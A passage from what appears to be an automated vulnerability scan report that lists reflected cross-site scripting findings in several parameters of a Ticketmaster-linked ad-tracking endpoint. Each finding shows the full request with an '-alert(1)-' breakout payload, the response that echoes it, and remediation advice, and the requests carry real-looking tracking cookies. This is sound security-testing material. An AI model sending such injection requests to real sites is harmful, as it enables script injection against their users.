Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:55 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38410
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='7d062'-alert(1)-'cd41cc7dc96';
var eventid='000043582C516D43';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e =
...[SNIP]...

4.61. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_date_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_date_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9fd05'-alert(1)-'d3d6bae4899 was submitted in the _RM_HTML_event_date_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F20119fd05'-alert(1)-'d3d6bae4899&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:56 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/20119fd05'-alert(1)-'d3d6bae4899';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue=''
...[SNIP]...

4.62. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_day_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_day_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5a194'-alert(1)-'7572b7944d9 was submitted in the _RM_HTML_event_day_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed5a194'-alert(1)-'7572b7944d9&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:09 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed5a194'-alert(1)-'7572b7944d9';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip=
...[SNIP]...

4.63. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_name_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_name_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 540a3'-alert(1)-'11fecdb1994 was submitted in the _RM_HTML_event_name_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour540a3'-alert(1)-'11fecdb1994&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:40:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour540a3'-alert(1)-'11fecdb1994';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
...[SNIP]...

4.64. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_time_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35faf'-alert(1)-'c3b69505d19 was submitted in the _RM_HTML_event_time_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM35faf'-alert(1)-'c3b69505d19&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:04 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York';
var event_time='07:00%20PM35faf'-alert(1)-'c3b69505d19';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var
...[SNIP]...

4.65. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_event_time_zone_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_event_time_zone_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ff5'-alert(1)-'ce08c7702c7 was submitted in the _RM_HTML_event_time_zone_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York40ff5'-alert(1)-'ce08c7702c7&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:00 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38472
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='u2';
var event_name='U2%20360%BA%20Tour';
var event_date='07/20/2011';
var event_time_zone='America/New_York40ff5'-alert(1)-'ce08c7702c7';
var event_time='07:00%20PM';
var event_day='Wed';
var venue_name='New%20Meadowlands%20Stadium';
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var
...[SNIP]...

4.66. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_eventid_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_eventid_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a82c'-alert(1)-'cda4bbfe238 was submitted in the _RM_HTML_eventid_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D437a82c'-alert(1)-'cda4bbfe238&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://ads.as4x.tmcs.ticketmaster.com/html.ng/site=tm&pagepos=990&adsize=1x1&brand=0&event_name='U2%20360%BA%20Tour'&venue_name='New%20Meadowlands%20Stadium'&eventid=000043582C516D43&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&pagename=edp&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&event_date='07/20/2011'&event_time_zone='America/New_York'&event_time='07:00%20PM'&event_day='Wed'&true_ref=http%253A%252F%252Fbing.fansnap.com%252Fu2-tickets%252Fu2-with-interpol-rescheduled-from-719%252Fjuly-20-2011-389669%253Futm_source%253D1987%2526ack%253Dhttp%25253a%25252f%25252fwww.bing.com%25252fs%25252fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; RMFM=011QbQnIJ10I1k|U10JLQ|M10TqE; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; id=2814750682866683

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:41:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 38441
Content-Type: text/html

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); }

var artist1_name='
...[SNIP]...
var venuezip='07073';
var tixp='';
var fvalue='';
var confcode='';
var pdate='';
var ptime='';
var pday='';
var bstate='';
var bzip='';
var country='';
var eventid='000043582C516D437a82c'-alert(1)-'cda4bbfe238';
var venueid='1233';
var artistid='1308249';
var majorcatid='10001';
var minorcatid='1';

// For Purchase Tracking
var b3_d = new Image (1,1);
var b3_e = new Image (1,1);
var b3_f = new
...[SNIP]...

4.67. http://b3.mookie1.com/2/ticketmaster/ZAP/1@x01 [_RM_HTML_fvalue_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/ticketmaster/ZAP/1@x01

Issue detail

The value of the _RM_HTML_fvalue_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e52e9'-alert(1)-'5f1da305d60 was submitted in the _RM_HTML_fvalue_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/ticketmaster/ZAP/1@x01?&_RM_HTML_artist1_name_=u2&_RM_HTML_event_name_=U2%20360%BA%20Tour&_RM_HTML_event_date_=07%2F20%2F2011&_RM_HTML_event_time_zone_=America%2FNew_York&_RM_HTML_event_time_=07:00%20PM&_RM_HTML_event_day_=Wed&_RM_HTML_venue_name_=New%20Meadowlands%20Stadium&_RM_HTML_venuezip_=07073&_RM_HTML_tixp_=&_RM_HTML_fvalue_=e52e9'-alert(1)-'5f1da305d60&_RM_HTML_confcode_=&_RM_HTML_pdate_=&_RM_HTML_ptime_=&_RM_HTML_pday_=&_RM_HTML_bstate_=&_RM_HTML_bzip_=&_RM_HTML_country_=&_RM_HTML_eventid_=000043582C516D43&_RM_HTML_venueid_=1233&_RM_HTML_artistid_=1308249&_RM_HTML_majorcatid_=10001&_RM_HTML_minorcatid_=1&_RM_HTML_referer=http%253A%252F%252Fwww.ticketmaster.com%252Fevent%252F000043582C516D43%253Fartistid%253D736365%2526majorcatid%253D10001%2526minorcatid%253D1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
